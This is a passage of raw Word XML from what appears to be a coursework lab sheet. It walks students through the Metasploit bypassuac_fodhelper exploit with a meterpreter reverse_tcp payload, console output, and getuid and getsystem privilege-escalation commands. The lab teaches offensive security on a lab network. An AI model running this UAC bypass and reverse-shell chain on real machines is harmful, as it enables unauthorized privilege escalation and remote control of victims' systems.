                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4645152" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4645152" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4645152"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1616" name="Shape 11616"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="2430780" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2430780" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2430780" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2430780"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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="37453CB5" id="Group 9855" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:1.5pt;width:365.75pt;height:27.6pt;z-index:-251650048" coordsize="46451,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HM7yQIAAM0JAAAOAAAAZHJzL2Uyb0RvYy54bWzsVslu2zAQvRfoPxC6N1oSOalgO4emyaVo&#10;iyb9AIaiFoAiCZKx7L/vcCRRigOkQbqgh/ogjchZH+eNub7cd4LsuLGtkpsoPUkiwiVTZSvrTfT9&#10;7vrdRUSso7KkQkm+iQ7cRpfbt2/WvS54pholSm4IOJG26PUmapzTRRxb1vCO2hOluYTNSpmOOvg0&#10;dVwa2oP3TsRZkqziXplSG8W4tbB6NWxGW/RfVZy5L1VluSNiE0FuDp8Gn/f+GW/XtKgN1U3LxjTo&#10;K7LoaCshaHB1RR0lD6Z94qprmVFWVe6EqS5WVdUyjjVANWlyVM2NUQ8aa6mLvtYBJoD2CKdXu2Wf&#10;d18NactN9P4izyMiaQenhIEJrgBAva4L0Lsx+lZ/NeNCPXz5mveV6fwbqiF7hPYQoOV7Rxgsnq3O&#10;8jTPIsJg7zRP8mzEnjVwQE/MWPPxecN4Chv77EIyvYY2sjNS9teQum2o5ngA1iMwIpWmqzRAhSpk&#10;WEJoUDMAZQsLmL0KpfQ8z1aIUiiWFuzBuhuuEG+6+2Td0MDlJNFmktheTqIBGjxLAE2dt/NpepH0&#10;iwNrgNZDJn67Uzt+p1DRHZ0aZDnvCrnUCqc/NQboThrTW6O/peYjACa16T2oA6XB5YsVJzQHJ5CE&#10;r3a7HgVEAOQlxkJ6MCAMozCdKkEd0rxrHYwt0XYQPDtPktkxePNNOJw6Su4guAdMyG+8AqohRfyC&#10;NfX9B2HIjvrhhD8/jxAbUPUqVStEsEox9COra/iF4KOyt+M4+oJlMliyMeAw/2CKQF3TFISowQgj&#10;K+mCvYTZjaktCvLivSoPOBGwZiCeHxZ/iYGraVjNDFz5HH0CwNWXMnDuHQBgnDnZ2WlyfuEP/bi5&#10;plG3bJE/SsOQyu+gYXD2UxouNWeEsDMHXv+n4ZK8/x4N8W8R7gw4Tsb7jb+ULL9xVM23sO0PAAAA&#10;//8DAFBLAwQUAAYACAAAACEArmIXxN0AAAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF&#10;74L/YRnBm92kIVpiJqUU9VQEW0G8TZNpEprdDdltkv57x5Oehsd7vPdNvp5Np0YefOssQryIQLEt&#10;XdXaGuHz8PqwAuUD2Yo6Zxnhyh7Wxe1NTlnlJvvB4z7USkqszwihCaHPtPZlw4b8wvVsxTu5wVAQ&#10;OdS6GmiSctPpZRQ9akOtlYWGet42XJ73F4PwNtG0SeKXcXc+ba/fh/T9axcz4v3dvHkGFXgOf2H4&#10;xRd0KITp6C628qpDkEcCQiJHzKckTkEdEdLVEnSR6//0xQ8AAAD//wMAUEsBAi0AFAAGAAgAAAAh&#10;ALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAU&#10;AAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAU&#10;AAYACAAAACEAMNxzO8kCAADNCQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEArmIXxN0AAAAFAQAADwAAAAAAAAAAAAAAAAAjBQAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAC0GAAAAAA==&#10;">
                <v:shape id="Shape 11615" o:spid="_x0000_s1027" style="position:absolute;width:46451;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4645152,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HmjcMA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/sfwix407Q+ylKNshRkBU8+YK9jM7Z1&#10;m0lpsrX+eyMI3ubje85y3ZtadNS6yrKCeByBIM6trrhQcDpuRl8gnEfWWFsmBXdysF59DJaYanvj&#10;PXUHX4gQwi5FBaX3TSqly0sy6Ma2IQ7cxbYGfYBtIXWLtxBuajmJokQarDg0lNhQVlL+d/g3Csy8&#10;63/wmk3jWXY35yg7J7/XnVLDz/57AcJT79/il3urw/w4iefwfCfcIF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HmjcMAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l4645152,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4645152,175260"/>
                </v:shape>
                <v:shape id="Shape 11616" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:24307;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="243078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7GscQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6ma1DRpdxQpC6a3Rg8cxOybB&#10;7GzIbmPaX98tFLzN433OejvYRvTU+dqxBjVNQBAXztRcajgdD88LED4gG2wck4Zv8rDdjJ7WmBl3&#10;50/q81CKGMI+Qw1VCG0mpS8qsuinriWO3NV1FkOEXSlNh/cYbhs5S5JUWqw5NlTY0r6i4pZ/WQ2z&#10;8zJ/lcefy0kl85e9/zi89YXSejIedisQgYbwEP+7302cr1KVwt878Qa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exrHEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l2430780,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2430780,175260"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload =&gt; windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="764"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit(windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; set LPORT 3333 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT =&gt; 3333 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="1791"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit(windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; set TARGET 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET =&gt; 0 </w:t>
      </w:r>
      <w:r>
        <w:t>msf6 exploit(windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; exploit  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 10.0.2.15:3333  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="673" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. [*] Exploit completed, but no session was created. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="802" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9084"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="234" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">This is the step to escalate the privilege. Since this machine is not vulnerable, try the same steps with Windows 10 machine and escalate privilege by exploiting the client’s vulnerabilities…. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Try them and record them in your coursework and/or in the shared </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Onenote</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> with instructions to gain CREDITS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="358" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have exploited the vulnerable machine successfully following the above steps, (Win 10) you should bypass UAC settings in Windows 10 machine and get into a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> session. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From this point, record your reflections: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9084"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD4060">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598F2E0E" wp14:editId="00F6B25D">
                  <wp:extent cx="3990975" cy="6286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990975" cy="628650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –t 1  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD4060">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
